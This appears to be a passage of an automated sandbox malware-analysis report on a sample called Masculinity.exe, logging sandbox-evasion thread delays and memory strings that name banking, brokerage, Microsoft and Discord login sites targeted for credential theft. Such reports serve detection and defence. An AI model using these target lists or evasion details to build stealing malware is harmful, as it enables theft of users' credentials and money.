Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Memory allocated: 20E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Memory allocated: 20C80000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 595030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7503	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2173	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Window / User API: threadDelayed 928	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe	Window / User API: threadDelayed 8919	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5788	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 5892	Thread sleep count: 928 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 5892	Thread sleep count: 8919 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -595030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Masculinity.exe TID: 2748	Thread sleep time: -594484s >= -30000s	Jump to behavior

Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3275528643.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3275528643.0000000004B25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Masculinity.exe, 00000007.00000002.3288557746.0000000021EF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Masculinity.exe, 00000007.00000002.3288557746.000000002220E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
